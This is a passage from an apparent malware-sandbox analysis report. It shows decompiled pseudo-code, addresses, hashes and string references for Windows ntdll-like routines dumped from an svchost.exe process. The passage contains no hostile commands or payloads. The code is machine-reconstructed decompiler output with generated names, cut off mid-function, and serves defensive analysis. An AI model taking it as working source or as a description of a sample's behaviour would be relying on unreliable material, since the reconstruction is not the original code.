							_t79 =  &_v352;
							E03AA3787(_a4,  &_v352, _t80);
						}
					}
					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E03A695D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                          0x03aa3552
                                          0x03aa355a
                                          0x03aa355d
                                          0x03aa3566
                                          0x03aa3567
                                          0x03aa357e
                                          0x03aa358f
                                          0x03aa35a1
                                          0x03aa35a5
                                          0x03aa366b
                                          0x03aa366b
                                          0x03aa366d
                                          0x03aa3672
                                          0x03aa3679
                                          0x03aa3685
                                          0x03aa368d
                                          0x03aa369d
                                          0x03aa36a7
                                          0x03aa36b8
                                          0x03aa36c6
                                          0x03aa36c7
                                          0x03aa36dc
                                          0x03aa36e1
                                          0x03aa36e7
                                          0x03aa36e9
                                          0x03aa36e9
                                          0x03aa3703
                                          0x03aa3703
                                          0x03aa35b5
                                          0x03aa35c0
                                          0x03aa35c4
                                          0x00000000
                                          0x00000000
                                          0x03aa35ca
                                          0x03aa35d7
                                          0x03aa35e2
                                          0x03aa35e6
                                          0x03aa35e8
                                          0x03aa35f5
                                          0x03aa35fa
                                          0x03aa3603
                                          0x03aa3604
                                          0x03aa3609
                                          0x03aa360a
                                          0x03aa3612
                                          0x03aa3613
                                          0x03aa361e
                                          0x03aa3622
                                          0x03aa3628
                                          0x03aa362f
                                          0x03aa362f
                                          0x03aa3636
                                          0x03aa3638
                                          0x03aa363b
                                          0x03aa3642
                                          0x03aa3642
                                          0x03aa3636
                                          0x03aa3657
                                          0x03aa3657
                                          0x03aa365c
                                          0x03aa3662
                                          0x03aa3669
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: 62ec7c7f5010b7f1181a5bae286f4decbd5b89a60cb2acbec0276c2bacd47ca2
                                          • Instruction ID: 0485301f164975da012c6bd4607605a64ab84daf3c6927deac170a9fe95b07d6
                                          • Opcode Fuzzy Hash: 62ec7c7f5010b7f1181a5bae286f4decbd5b89a60cb2acbec0276c2bacd47ca2
                                          • Instruction Fuzzy Hash: 704147B6D0062C9BDF21DA54CD80FEFB77CAB44714F0045E6E609AB280DB349E888F94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E03AF05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E03AF07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03A69730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E03AEA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E03AEA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E03AF1293(_t79, _v40, E03AF07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E03A47D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E03AE138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                          0x03af05c5
                                          0x03af05ca
                                          0x03af05d3
                                          0x03af06db
                                          0x03af06db
                                          0x03af06dd
                                          0x03af06e3
                                          0x03af06e3
                                          0x03af05dd
                                          0x03af05e7
                                          0x03af05f6
                                          0x03af0600
                                          0x03af0607
                                          0x03af0610
                                          0x03af0615
                                          0x03af061a
                                          0x03af061c
                                          0x03af061e
                                          0x03af0624
                                          0x03af0625
                                          0x03af0627
                                          0x03af0628
                                          0x03af0631
                                          0x03af0640
                                          0x03af064d
                                          0x03af0654
                                          0x03af0654
                                          0x03af0631
                                          0x03af066d
                                          0x03af0674
                                          0x00000000
                                          0x00000000
                                          0x03af0692
                                          0x03af069e
                                          0x03af06b0
                                          0x03af06a0
                                          0x03af06a9
                                          0x03af06a9
                                          0x03af06b8
                                          0x03af06d6
                                          0x03af06d6
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction ID: 21fa03d2f02645f3f0f087e5f316a3e5e0658a634f9f8160055729c121b6d63d
                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction Fuzzy Hash: 8E31C032704345AFE720DF64CD85F9BB799AB84754F08422AFA589B281E7B4E904CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AA3884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E03AA3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03A69650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L03A44620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03A69650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                          0x03aa3893
                                          0x03aa3896
                                          0x03aa3899
                                          0x03aa389f
                                          0x03aa38a0
                                          0x03aa38a4
                                          0x03aa38a9
                                          0x03aa38ac
                                          0x03aa38ad
                                          0x03aa38ae
                                          0x03aa38af
                                          0x03aa38b1
                                          0x03aa38b4
                                          0x03aa38bb
                                          0x03aa38bc
                                          0x03aa38bd
                                          0x03aa38c4
                                          0x03aa38c8
                                          0x03aa38ca
                                          0x03aa38ca
                                          0x03aa38d5
                                          0x03aa393e
                                          0x03aa3940
                                          0x03aa3942
                                          0x03aa3952
                                          0x03aa3954
                                          0x03aa3961
                                          0x03aa3961
                                          0x03aa3967
                                          0x03aa396e
                                          0x03aa396e
                                          0x03aa3947
                                          0x03aa394c
                                          0x00000000
                                          0x03aa394c
                                          0x03aa38ea
                                          0x03aa38ee
                                          0x03aa38f8
                                          0x03aa38f9
                                          0x03aa38ff
                                          0x03aa3900
                                          0x03aa3902
                                          0x03aa3903
                                          0x03aa390b
                                          0x03aa390f
                                          0x03aa3950
                                          0x00000000
                                          0x03aa3950
                                          0x03aa3915
                                          0x03aa391d
                                          0x03aa391d
                                          0x03aa3922
                                          0x03aa3926
                                          0x00000000
                                          0x03aa3928
                                          0x03aa392b
                                          0x03aa392b
                                          0x03aa3935
                                          0x03aa3937
                                          0x03aa3937
                                          0x00000000
                                          0x03aa3935
                                          0x03aa3926
                                          0x03aa38f0
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: 65c2badc550b999b0cbe5fd0335f25f6908f11c458ed8604ade25b45246b4336
                                          • Instruction ID: 60ad0626197777a8e315e1a5fdb6344fc4612975e96deb68d1ed45159cfce006
                                          • Opcode Fuzzy Hash: 65c2badc550b999b0cbe5fd0335f25f6908f11c458ed8604ade25b45246b4336
                                          • Instruction Fuzzy Hash: B731FF3B905A0AAFEF15DB5DC955E6BF778EB80B20F01416EE914AB380D7309E04C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 33%
                                          			E03A5D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x3b1d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E03A44120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E03A6B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E03A698D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E03A695D0();
					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                          0x03a5d29c
                                          0x03a5d2a6
                                          0x03a5d2b1
                                          0x03a5d2b5
                                          0x03a5d2b6
                                          0x03a5d2bc
                                          0x03a5d2bd
                                          0x03a5d2be
                                          0x03a5d2bf
                                          0x03a5d2c2
                                          0x03a5d2c4
                                          0x03a5d2cc
                                          0x03a5d384
                                          0x03a5d34b
                                          0x03a5d34f
                                          0x03a5d350
                                          0x03a5d351
                                          0x03a5d35c
                                          0x03a5d35c
                                          0x03a5d2d6
                                          0x03a5d2da
                                          0x03a5d2e1
                                          0x03a5d361
                                          0x03a5d369
                                          0x03a5d36d
                                          0x03a5d2e3
                                          0x03a5d2e3
                                          0x03a5d2e3
                                          0x03a5d2e5
                                          0x03a5d2ed
                                          0x03a5d2f5
                                          0x03a5d2fa
                                          0x03a5d302
                                          0x03a5d303
                                          0x03a5d30b
                                          0x03a5d30f
                                          0x03a5d313
                                          0x03a5d318
                                          0x03a5d31c
                                          0x03a5d320
                                          0x03a5d379
                                          0x03a5d37d
                                          0x00000000
                                          0x00000000
                                          0x03a9affe
                                          0x03a9b001
                                          0x03a9b011
                                          0x00000000
                                          0x03a5d322
                                          0x03a5d322
                                          0x03a5d330
                                          0x03a5d337
                                          0x03a5d35d
                                          0x03a5d339
                                          0x03a5d33f
                                          0x03a5d38c
                                          0x03a5d38c
                                          0x03a5d33f
                                          0x03a5d349
                                          0x00000000
                                          0x03a5d349

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: c19a3620e171741a8317b08af40d4858b7c55d50e6bec30431d63ca526dd8805
                                          • Instruction ID: f2ec9f46063961ab4a913edf97d81a31097a319ebcd5c796d36c8f843aa2ff1a
                                          • Opcode Fuzzy Hash: c19a3620e171741a8317b08af40d4858b7c55d50e6bec30431d63ca526dd8805
                                          • Instruction Fuzzy Hash: A231ADB5509305AFC710DF28C980A6BBBF8EB99664F04092FF99497210E735DD08CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A31B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E03A31B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E03A6BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E03A6A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E03A6A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L03A44620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                          0x03a31b8f
                                          0x03a31b9a
                                          0x03a31b9c
                                          0x03a31b9e
                                          0x03a31ba3
                                          0x03a87010
                                          0x03a87010
                                          0x00000000
                                          0x03a31ba9
                                          0x03a31ba9
                                          0x03a31bae
                                          0x00000000
                                          0x03a31bc5
                                          0x03a31bca
                                          0x03a31bcf
                                          0x03a31bd0
                                          0x03a31bd1
                                          0x03a31bd2
                                          0x03a31bd6
                                          0x03a31bdc
                                          0x03a31be0
                                          0x03a86ffc
                                          0x03a87000
                                          0x00000000
                                          0x03a87006
                                          0x03a87009
                                          0x03a87009
                                          0x03a31be6
                                          0x03a31bec
                                          0x03a31c0b
                                          0x03a31c0b
                                          0x03a31c0c
                                          0x03a31c11
                                          0x03a31c12
                                          0x03a31c15
                                          0x03a31c1b
                                          0x03a31c1f
                                          0x03a31c31
                                          0x03a31c33
                                          0x03a87026
                                          0x03a87026
                                          0x03a31c21
                                          0x03a31c24
                                          0x03a31c24
                                          0x03a31bee
                                          0x03a31bee
                                          0x03a31bf2
                                          0x03a31c3a
                                          0x03a31bf4
                                          0x03a31bf4
                                          0x03a31c05
                                          0x03a31c05
                                          0x03a31c09
                                          0x03a31c3e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a31c09
                                          0x03a31bec
                                          0x03a31be0
                                          0x03a31bae
                                          0x03a31c2e

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction ID: a66889b2268123072e7c3323170c794e84955dbbcd829fd308e76cbb18942bde
                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction Fuzzy Hash: 7121F277500228ABCB21FB55C944F6BF7BDAF82B50F29486BF9149B200D635DC0197B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A4F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E03A4F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                          0x03a4f71d
                                          0x03a4f722
                                          0x03a4f726
                                          0x03a94770
                                          0x03a4f765
                                          0x03a4f769
                                          0x03a4f769
                                          0x03a4f732
                                          0x03a9477a
                                          0x00000000
                                          0x03a9477a
                                          0x03a4f738
                                          0x03a4f73a
                                          0x03a4f73c
                                          0x03a4f73f
                                          0x03a4f746
                                          0x03a4f778
                                          0x03a4f7a9
                                          0x03a4f7a9
                                          0x03a4f754
                                          0x03a4f75a
                                          0x03a4f75d
                                          0x03a4f75f
                                          0x03a4f761
                                          0x03a4f76f
                                          0x03a4f771
                                          0x03a4f771
                                          0x03a4f76f
                                          0x03a4f763
                                          0x00000000
                                          0x03a4f763
                                          0x03a4f77d
                                          0x03a4f7a3
                                          0x03a4f7a5
                                          0x00000000
                                          0x03a4f7a5
                                          0x03a4f77f
                                          0x03a4f782
                                          0x03a4f784
                                          0x03a4f786
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a4f788
                                          0x03a4f748
                                          0x03a4f74d
                                          0x03a4f78d
                                          0x03a4f793
                                          0x03a4f7b7
                                          0x03a4f7bc
                                          0x00000000
                                          0x03a4f7bc
                                          0x03a4f798
                                          0x00000000
                                          0x00000000
                                          0x03a4f79d
                                          0x03a4f7b0
                                          0x00000000
                                          0x03a4f7b0
                                          0x03a4f79f
                                          0x00000000
                                          0x03a4f74f
                                          0x03a4f74f
                                          0x00000000
                                          0x03a4f74f

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: 2542933cdc5e019ba3001bb843b357783b47b8c01980fc71e4b78d7f9e6cdb0a
                                          • Instruction ID: 6ffa3b9e9827da9d5a8c250f1ff5cbaebf7289310557997f953d6e7c76dfdb10
                                          • Opcode Fuzzy Hash: 2542933cdc5e019ba3001bb843b357783b47b8c01980fc71e4b78d7f9e6cdb0a
                                          • Instruction Fuzzy Hash: 28119035B446028FFB24CF1D8B90736B2E9ABC7624F28652FE461CB791DA78C8418740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AD8DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E03AD8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x3b00d50);
				E03A7D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E03AB5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L03A7DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L03A7DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E03A7D130(_t34, _t39, _t40);
			}





                                          0x03ad8df1
                                          0x03ad8df1
                                          0x03ad8df1
                                          0x03ad8df1
                                          0x03ad8df1
                                          0x03ad8df1
                                          0x03ad8df3
                                          0x03ad8df8
                                          0x03ad8dfd
                                          0x03ad8e00
                                          0x03ad8e0e
                                          0x03ad8e2a
                                          0x03ad8e36
                                          0x03ad8e38
                                          0x03ad8e3c
                                          0x03ad8e46
                                          0x03ad8e46
                                          0x03ad8e36
                                          0x03ad8e50
                                          0x03ad8e56
                                          0x03ad8e59
                                          0x03ad8e5c
                                          0x03ad8e60
                                          0x03ad8e67
                                          0x03ad8e6d
                                          0x03ad8e73
                                          0x03ad8e74
                                          0x03ad8eb1
                                          0x03ad8ebd

                                          Strings
                                          • Critical error detected %lx, xrefs: 03AD8E21
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Critical error detected %lx
                                          • API String ID: 0-802127002
                                          • Opcode ID: ac862dab6ab1d342da2f0e264a05dabd3f9fe030ec2b4538cff0ffb54a6dc570
                                          • Instruction ID: 1d28d295424d41f887b321819427d9f37fbbcfe346b362f5f9778a058bbf7169
                                          • Opcode Fuzzy Hash: ac862dab6ab1d342da2f0e264a05dabd3f9fe030ec2b4538cff0ffb54a6dc570
                                          • Instruction Fuzzy Hash: 52113575D14348EADB25DFA88A4579CBBB8BF05714F24426ED42AAB392C7388602CF15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03ABFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          Strings
                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 03ABFF60
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                          • API String ID: 0-1911121157
                                          • Opcode ID: f936322fe0b26fe04ee5816e678b1983bc6b40efb650837b68bdf48674e3a397
                                          • Instruction ID: e4f20b63137784661945e9ca230de8bff311838e565ca5c343db7b5cb527c8ce
                                          • Opcode Fuzzy Hash: f936322fe0b26fe04ee5816e678b1983bc6b40efb650837b68bdf48674e3a397
                                          • Instruction Fuzzy Hash: D6110475910244EFCB22EF60CE49FD8BBB5FF09704F18805AE0056B6A2C7399950CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF5BA5 Relevance: .6, Instructions: 592COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E03AF5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x3b01178);
				E03A7D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
